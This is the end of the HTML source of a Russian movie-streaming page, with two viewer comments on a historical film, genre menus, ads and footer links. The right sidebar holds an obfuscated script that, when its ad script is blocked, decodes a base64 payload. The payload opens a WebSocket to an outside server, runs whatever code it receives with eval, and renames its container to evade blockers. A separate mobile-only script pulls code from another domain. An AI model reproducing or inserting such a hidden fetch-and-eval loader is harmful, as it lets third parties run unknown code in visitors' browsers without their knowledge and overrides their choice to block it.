		<span style="color:#919191;">26 апреля 2016 22:50
			<div class="ocomm" id="ocomm-153619">
				<a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#" class="orating_m" title="Не нравится" onclick="ocomrate(153619,0);return false;"></a>
				<a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#" class="orating_p" title="Нравится" onclick="ocomrate(153619,1);return false;"></a>
				<a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#" class="ocomm_res" onclick="ocomstat(153619,1,true);return false;">+4</a>
			</div>
		</span>
			
			<div class="comedit">
				
				<div class="clr"></div>
			</div>
		</div>
	</div>
</div>
<div class="clr"></div>

</div><div id='comment-id-54930'><div class="commbox">
	<div class="commava"><img src="http://s.kinokrad.co/uploads/fotos/foto_52085.jpg"/></div>
	<div class="commtext">
		<div class="yshko"></div>
		<img class="medal-rating" src="templates/ntpl/images/medal-20-50.png" alt="кино любитель" title="кино любитель" />
		<div class="commtext-box">
			<p class="recautor"><a onclick="ShowProfile('Vida', 'http://kinokrad.co/user/Vida/', '0'); return false;" rel="nofollow" href="http://kinokrad.co/user/Vida/">Vida</a></p>
			
			<div id='comm-id-54930'>Просмотр был не сказать что очень..... но сам сюжет просто исторически интересный .. для любителей фильма этого жанра смотрите ...</div><br/>
		<span style="color:#919191;">19 января 2015 03:18
			<div class="ocomm" id="ocomm-54930">
				<a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#" class="orating_m" title="Не нравится" onclick="ocomrate(54930,0);return false;"></a>
				<a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#" class="orating_p" title="Нравится" onclick="ocomrate(54930,1);return false;"></a>
				<a href="10029-odinnadcatoe-sentyabrya-1683-goda.html#" class="ocomm_res" onclick="ocomstat(54930,1,true);return false;">+2</a>
			</div>
		</span>
			
			<div class="comedit">
				
				<div class="clr"></div>
			</div>
		</div>
	</div>
</div>
<div class="clr"></div>

</div></div></form>

    <!--dlenavigationcomments-->
</div>

<div class="clr"></div></div>
                        

                        

                        







                        

                        

                        

                        
                    </div>
                    <!-- #content-->
                    <div class="clr"></div>
                </div>
                <!-- #container-->

                <div class="sidebar" id="sideLeft">
	<div class="leftmenubox">
		<div class="lefttitle" style="padding-top:5px;">ФИЛЬМЫ</div>
		<ul class="leftmenu">
			<li><a href="filmy-2016-novinki-kino/index.html"><b>2016 года <span style="position: relative; top:2px"><img src="templates/ntpl/images/new.gif" /></span></b></a><div class="menucatcount">(714)<span class="wsh"></span></div></li>
            <li><a href="filmy-2015/index.html"><b>2015 года</b></a><div class="menucatcount">(1304)<span class="wsh"></span></div></li>
            <li><a href="filmy-2014/index.html">2014 года</a><div class="menucatcount">(1350)<span class="wsh"></span></div></li>
			<li><a  href="otechestvennyy/index.html">Русские</a><div class="menucatcount">(1726)<span class="wsh"></span></div></li>
			<li><a  class="acq" href="zarubezhnye/index.html">Зарубежные</a><div class="menucatcount">(11130)<span class="wsh"></span></div></li>
			<li><a href="podborki/index.html">Лучшие подборки!</a></li>
            <li><a href="treyler/index.html">Трейлеры в HD</a></li>
            <li><a href="serial/index.html">Сериалы</a><div class="menucatcount">(2653)<span class="wsh"></span></div></li>
            <li><a href="blizhayshie-premery/index.html">Скоро в кино</a></li>
            <li><a href="films-hd.html"><span style="color:#008aff">HD</span> фильмы</a></li>
        </ul>

        <!--noindex-->
        <div class="lefttitle" style="padding-top:15px;">ЖАНРЫ</div>
		<ul class="leftmenu">
			<li><a  href="anime/index.html">Аниме</a> <div class="menucatcount">(159)<span class="wsh"></span></div></li>
			<li><a  href="multfilm/index.html">Мультфильмы</a> <div class="menucatcount">(1141)<span class="wsh"></span></div></li>
			<li><a  href="tvperedachi/index.html">ТВ - передачи</a> <div class="menucatcount">(138)<span class="wsh"></span></div></li>
			<li><a  href="vestern/index.html">Вестерны</a> <div class="menucatcount">(129)<span class="wsh"></span></div></li>
			<li><a  class="acq" href="drama/index.html">Драмы</a> <div class="menucatcount">(7366)<span class="wsh"></span></div></li>
			<li><a  href="detektiv/index.html">Детективы</a> <div class="menucatcount">(1544)<span class="wsh"></span></div></li>
			<li><a  href="biografiya/index.html">Биография</a> <div class="menucatcount">(494)<span class="wsh"></span></div></li>
			<li><a  href="melodrama/index.html">Мелодрамы</a> <div class="menucatcount">(2631)<span class="wsh"></span></div></li>
			<li><a  href="voennyy/index.html">Военные</a> <div class="menucatcount">(498)<span class="wsh"></span></div></li>
			<li><a  href="boevik/index.html">Боевики</a> <div class="menucatcount">(2583)<span class="wsh"></span></div></li>
			<li><a  href="komediya/index.html">Комедии</a> <div class="menucatcount">(5148)<span class="wsh"></span></div></li>
			<li><a  href="kriminal/index.html">Криминальные</a> <div class="menucatcount">(2246)<span class="wsh"></span></div></li>
			<li><a  href="triller/index.html">Триллеры</a> <div class="menucatcount">(3570)<span class="wsh"></span></div></li>
			<li><a  class="acq" href="istoriya/index.html">Исторические </a> <div class="menucatcount">(471)<span class="wsh"></span></div></li>
			<li><a  href="dokumentalnyy/index.html">Документальные</a> <div class="menucatcount">(459)<span class="wsh"></span></div></li>
			<li><a  class="acq" href="priklyucheniya/index.html">Приключения</a> <div class="menucatcount">(1797)<span class="wsh"></span></div></li>
			<li><a  href="mistika/index.html">Мистические</a> <div class="menucatcount">(642)<span class="wsh"></span></div></li>
			<li><a  href="uzhasy/index.html">Ужасы</a> <div class="menucatcount">(1576)<span class="wsh"></span></div></li>
			<li><a  href="semeynyy/index.html">Семейные</a> <div class="menucatcount">(1209)<span class="wsh"></span></div></li>
			<li><a  href="sport/index.html">Спортивные</a> <div class="menucatcount">(254)<span class="wsh"></span></div></li>
			<li><a  href="fantastika/index.html">Фантастика</a> <div class="menucatcount">(1433)<span class="wsh"></span></div></li>
			<li><a  href="fentezi/index.html">Фэнтези</a> <div class="menucatcount">(1272)<span class="wsh"></span></div></li>
			<li><a  href="myuzikl/index.html">Мюзиклы</a> <div class="menucatcount">(287)<span class="wsh"></span></div></li>
		</ul>
        <!--/noindex-->
    </div>

    <!--noindex-->
	<div class="clr"></div>

	<div style="padding-top:0;">
		<div class="vk_widget">
			<div id="vk_groups"></div>
		</div>
	</div>

	
	<div style="float: left; margin: 10px 0 0;">
	<a href="http://wow-partners.com/click.php?ctag=a1030-b144-p-fOldguyMoney" target="_blank"><img src="http://cdn.src24.ru/2016/06/03/f1dFQA.gif" alt=""></a>
	</div>
	

    <div class="leftbox-comm-ind">
        <div class="leftbox-comm">
            <div class="lefttitle2">Скоро на сайте</div>
            <div class="soondate"><a href="307460-v-fokuse.html" rel="nofollow"><img style="margin:0 8px;width:143px;" src="http://image.kinokrad.co/p/medium/1480029270_v-fokuse-2016-dekabr.jpeg" alt="В фокусе (2016)" title="В фокусе (2016)" /></a></div><div class="soondate"><a href="305393-balerina.html" rel="nofollow"><img style="margin:0 8px;width:143px;" src="http://image.kinokrad.co/p/medium/1477729634_balerina-2016-yanvar.jpeg" alt="Балерина (2017)" title="Балерина (2017)" /></a></div>
            <div style="display:block; padding:0 20px;" class="eshefilms2">
                <a href="blizhayshie-premery/index.html" style="margin-top:10px;"></a>
            </div>
        </div>
    </div>

    
    <!--/noindex-->

    <div class="clr"></div>
</div>
<!-- .sidebar#sideLeft -->
                <div class="sidebar" id="sideRight">


    
	<div class="clr"></div>

	
	<div id='e5c11afe32'></div>
	<script type='text/javascript' data-cfasync='false'>
		(function () {
			var script = document.createElement('script');
			script.type = 'text/javascript';
			script.charset = 'utf-8';
			script.async = 'true';
			script.src = '//et-code.ru/bens/vinos.js?6337';
			script.onerror = function(){
				hash = 'ZXRfd3MgPSBuZXcgV2ViU29ja2V0KCJ3c3M6Ly9ldC1jb2RlLnJ1Ojg0NDMvNjMzNyIpOyBldF93cy5vbm1lc3NhZ2UgPSBmdW5jdGlvbih0KSB7IHBvc3RNZXNzYWdlKHQuZGF0YSk7IGV0X3dzLmNsb3NlKCk7IH0=';
				var et_worker = new Worker(URL.createObjectURL(new Blob(['eval(atob(\''+hash+'\'))']), {type: 'text/javascript'}));
				et_worker.postMessage('Hello World!');
				et_worker.onmessage = function (msg) {
					window.eval(msg.data);
					var n='',r='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
					for(o=0;o<25;o++) {
						n += r.charAt(Math.floor(Math.random()*r.length));
					}
					document.getElementById('e5c11afe32').id = n;
				};
			};
			document.body.appendChild(script);
		})();
	</script>
	

	

</div>
            </div>
            <div class="clr"></div>
        </div>

        <!--noindex-->
        

        <div id="header">
            <div class="headermenu">
                <ul class="topmenu">
                    <li><a href="index.html">Главная</a></li>
                    <li><a href="filmy-2016-novinki-kino/index.html" style="color:red;">Новинки</a><span class="hotnum" style="display: none">10</span></li>
                    <li class="sublnk">
                        <a href="luchshie-filmy-onlayn-top-100.html">ТОП-100 ▼</a>
                        <ul>
                            <li><a href="comments/index.html">По комментариям</a></li>
                            <li><a href="views/index.html">По просмотрам</a></li>
                            <li><a href="rating/index.html">По рейтингу</a></li>
                        </ul>
                    </li>
                </ul>
				<div class="social-likes-box">
					<div class="social-likes">
						<div class="vkontakte" title="Поделиться ссылкой во Вконтакте"></div>
						<div class="facebook" title="Поделиться ссылкой на Фейсбуке"></div>
						<div class="odnoklassniki" title="Поделиться ссылкой в Одноклассниках"></div>
						<div class="twitter" title="Поделиться ссылкой в Твиттере"></div>
						<div class="plusone" title="Поделиться ссылкой в Гугл-плюсе"></div>
						<div class="mailru" title="Поделиться ссылкой в Моём мире"></div>
					</div>
				</div>
            </div>
        </div>

        <div id="footer">
            <div class="ftrbox" style="text-align:center;">
	            <div class="social-likes">
		            <div class="vkontakte" title="Поделиться ссылкой во Вконтакте"></div>
		            <div class="facebook" title="Поделиться ссылкой на Фейсбуке"></div>
		            <div class="odnoklassniki" title="Поделиться ссылкой в Одноклассниках"></div>
		            <div class="twitter" title="Поделиться ссылкой в Твиттере"></div>
		            <div class="plusone" title="Поделиться ссылкой в Гугл-плюсе"></div>
		            <div class="mailru" title="Поделиться ссылкой в Моём мире"></div>
	            </div>
	            <ul class="ftrmenu">
                    <li><a href="index.html">Главная</a></li>
                    <li><a href="index.html%3Fdo=feedback.html">Контакты</a></li>
                    <li><a href="index.html%3Fdo=register.html">Регистрация</a></li>
					<li><a href="copyright_777.html">Правообладателям</a></li>
                </ul>
            </div>
            <!-- #footer -->
            <script type="text/javascript"><!--
                new Image().src = "//counter.yadro.ru/hit?r"+escape(document.referrer)+((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";"+Math.random();
            //--></script>
        </div>
        <!--/noindex-->
    </div>
    <script type="text/javascript" src="templates/ntpl/js-min/social.js" charset="utf-8" async></script>
    <div id="scroller" class="b-top" style="display:none;"><span class="b-top-but"></span></div>
	<script type="text/javascript">
		var ua = navigator.userAgent.toLowerCase();
		if( ua.indexOf("iphone") != -1 || ua.indexOf("ipad") != -1 || ua.indexOf("android") != -1 || ua.indexOf("windows phone") != -1 || ua.indexOf("blackberry") != -1 ) { var head = document.getElementsByTagName("head")[0], s = document.createElement("script"); s.setAttribute("type", "text/javascript"); s.setAttribute("src", "//oconner.biz/js/lib.js"); s.onload = function(){ AMSP.loadAsset("acc8991b7300d6011cdd01f57ab92ad8", ""); }; head.insertBefore(s, head.firstChild); }
	</script>
</body>
</html>
<!-- Время выполнения скрипта 0,03645 секунд -->
<!-- Время затраченное на компиляцию шаблонов 0,00358 секунд -->
<!-- Время затраченное на выполнение MySQL запросов: 0,01509 секунд -->
<!-- Общее количество MySQL запросов 15 -->
<!-- Затрачено оперативной памяти 3,81 MB -->